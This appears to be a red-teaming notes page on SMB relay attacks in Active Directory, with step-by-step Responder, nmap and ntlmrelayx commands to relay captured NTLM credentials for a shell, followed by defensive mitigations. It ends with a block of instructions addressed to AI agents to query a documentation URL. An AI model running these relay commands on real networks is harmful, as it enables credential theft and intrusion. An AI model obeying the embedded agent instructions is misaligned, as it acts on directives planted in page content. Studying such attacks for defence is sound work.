# SMB Relay ## What is SMB? **SMB (Server Message Block)** is a protocol widely used in Active Directory networks (and any other Windows network) to share files and communication between machines, usually Windows machines. Each Windows machine by default allows connections to it by using the SMB protocol. Originally, SMB works over NetBIOS (datagram and session services) but nowadays it can be used directly over TCP. The Windows computers have the port 445/TCP open to handle SMB connections. ``` .-------- | | .--- .--NBSSN-->| 139 | '--- .-----. | | Windows | SMB |>--| | '-----' | | machine | | .--- | '---TCP--->| 445 | '--- | | | | | '-------- .------------. | | .------. .----------. | NTLM | | Kerberos | '------' '----------' ``` As an attacker is useful to know about SMB since is used to create shares which can contain valuable information and can be used to exfiltrate information from machines. ## What is SMB Relay? Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access. The following two requirements must be satisfied for SMB relay attack to work: * **SMB signing must be disabled** on the target * **Relayed user credentials must be admin** on machine ## What is SMB Signing? **SMB signing** verifies the origin and authenticity of SMB packets. Effectively this stops MITM SMB relay attacks from happening. If this is enabled and required on a machine we will not be able to perform a SMB relay attack. ## Exploitation #### Step 1: Configuration Edit `/usr/share/responder/Responder.conf`: ``` SMB = Off ... HTTP = Off ``` #### Step 2: Run Responder ```shell responder -I tun0 -dw ``` #### Step 3: Discover hosts with SMB signing disabled ```shell nmap --script=smb2-security-mode.nse -p445 ``` Save hosts with SMB signing "disabled or not required" into `targets.txt`. #### Step 4: Use impacket-ntlmrelayx to get a SMB shell ```shell impacket-ntlmrelayx -tf targets.txt -smb2support -i nc 127.0.0.1 11000 ``` #### Step 5: Wait for an event When DNS error is triggered, we win. ## Defense * **Enable SMB Signing on all devices** * Pro: Completely stops the attack * Con: Can cause performance issues with file copies (15% loss) * **Disable NTLM authentication on network** * Pro: Completely stops the attack * Con: If Kerberos stops working, Windows defaults back to NTLM * **Account tiering** * Pro: Limits domain admins to specific tasks (e.g. only log onto servers with need for DA) * Con: Enforcing the policy may be difficult * **Local admin restriction** * Pro: Can prevent a lot of lateral movement * Con: Potential increase in the amount of service desk tickets --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ret2basic.gitbook.io/ctfnote/red-teaming/active-directory-ad/initial-compromise/smb-relay.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.